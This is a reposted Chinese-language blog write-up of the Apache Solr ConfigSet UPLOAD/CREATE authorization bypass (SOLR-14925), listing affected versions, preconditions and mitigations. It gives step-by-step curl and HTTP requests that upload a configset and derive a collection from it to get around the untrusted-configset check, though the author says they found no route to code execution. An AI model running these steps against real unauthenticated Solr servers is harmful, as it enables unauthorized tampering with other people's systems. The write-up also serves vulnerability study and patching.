影響版本
- 6.6.0 to 6.6.5
- 7.0.0 to 7.7.3
- 8.0.0 to 8.6.2
漏洞描述
本來Solr禁止了一些通過ConfigSet這個API上傳進行配置的功能,因為這種危險操作容易造成RCE,但是可以通過結合UPLOAD/CREATE這兩個ACTION來繞過這一限制,
原文
Solr prevents some features considered dangerous (which could be used for remote code execution) to be configured in a ConfigSet that’s uploaded via API without authentication/authorization. The checks in place to prevent such features can be circumvented by using a combination of UPLOAD/CREATE actions.
漏洞利用條件
- Solr的API未設定認證
- SolrCloud模式啟動(因為Standalone模式不具備Configset API的功能)
Upload a Configset
上傳功能默認開啟,除非指定JVM引數:
-Dconfigset.upload.enabled=false
漏洞描述/原理:
正常的通過UPLOAD傳上去的configset,是不能用于創建collection的: 如果嘗試創建,會出現這個錯誤
The configset for this collection was uploaded without any authentication in place, and use of <lib> is not available for collections with untrusted configsets. To use this component, re-upload the configset after enabling authentication and authorization.
而當我們先UPLOAD,然后基于這個configset,去CREATE一個collection,就可以繞過這個限制:
達到的效果是可以自定義configset,然后基于此創建惡意collection,目前沒想到如何利用好這個自定義的配置實作RCE,只知道用之前的模板注入,不過那個有版本限制吧?
步驟:
1、【UPLOAD】準備惡意配置,打包,上傳
# 先將配置打包成zip
(cd solr/server/solr/configsets/sample_techproducts_configs/conf && zip -r - *) > db-configset.zip
# 再通過上傳API將zip上傳
curl -X POST --header "Content-Type:application/octet-stream" --data-binary @db-configset.zip "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=db-configset"
2、【CREATE】根據UPLOAD的配置,創建一個新的配置,繞過不能通過直接UPLOAD創建collection的限制
/solr/admin/configs?action=CREATE&name=db-configset1&baseConfigSet=db-configset&configSetProp.immutable=false&wt=xml&omitHeader=true
3、【LIST】查看Configsets的配置,確保已生成了新的configset
/solr/admin/configs?action=LIST&omitHeader=true
4、根據CREATE得到的configset創建惡意collection
/solr/admin/collections?action=CREATE&numShards=1&name=coll_test1&collection.configName=db-configset1
5、利用之前的漏洞進行利用?
修復建議/緩解措施
- 禁用UPLOAD命令,即
-Dconfigset.upload.enabled=false; - 進行認證
- 升級到8.6.3及以上
- 若無法升級,嘗試打這個補丁:SOLR-14663
- 設定防火墻規則進行訪問控制,設定Solr API訪問的白名單
參考
- https://seclists.org/oss-sec/2020/q4/47
- ConfigSets CREATE does not set trusted flag
- https://issues.apache.org/jira/browse/SOLR-14925
Note
參考:
http://mail-archives.apache.org/mod_mbox/lucene-solr-user/201807.mbox/%3CCAPCX2-+jojXrWvPSPiBR_xwphdpk+yPM2HYLojX2rqRTKMGm9g@mail.gmail.com%3E
Solr可以運行在兩種模式:“Cloud” mode or “Standalone” mode,
SolrCloud mode下,可以創建collections,而在Standalone mode下,只能創建core,
在Standalone mode下會出現400,
關閉,重新啟動SolrCloud mode:
這次成功了:
附錄
上傳Configsets
# 先將配置打包成zip
(cd solr/server/solr/configsets/sample_techproducts_configs/conf && zip -r - *) > myconfigset.zip
# 再通過上傳API將zip上傳
curl -X POST --header "Content-Type:application/octet-stream" --data-binary @myconfigset.zip "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=myConfigSet"
創建Configsets
基于之前上傳的Configsets創建一個新的configset
- name:這個新的的configset的名字
- baseConfigSet:基于哪個上傳的Configsets
- configSetProp.immutable:將這個設定為false
http://cqq.com:8983/solr/admin/configs?action=CREATE&name=myConfigSet1&baseConfigSet=myConfigSet&configSetProp.immutable=false&wt=xml&omitHeader=true
查看Configsets:
http://cqq.com:8983/solr/admin/configs?action=LIST&omitHeader=true
上傳、以及配置后的Configsets并不在檔案系統中,而是在Zookeeper中,
The Configsets API enables you to upload new configsets to ZooKeeper, create, and delete configsets when Solr is running SolrCloud mode.
This API provides a way to upload configuration files to ZooKeeper and share the same set of configuration files between two or more collections.
轉載請註明出處,本文鏈接:https://www.uj5u.com/shujuku/173006.html
標籤:其他
上一篇:RabbitMQ安裝詳解耶???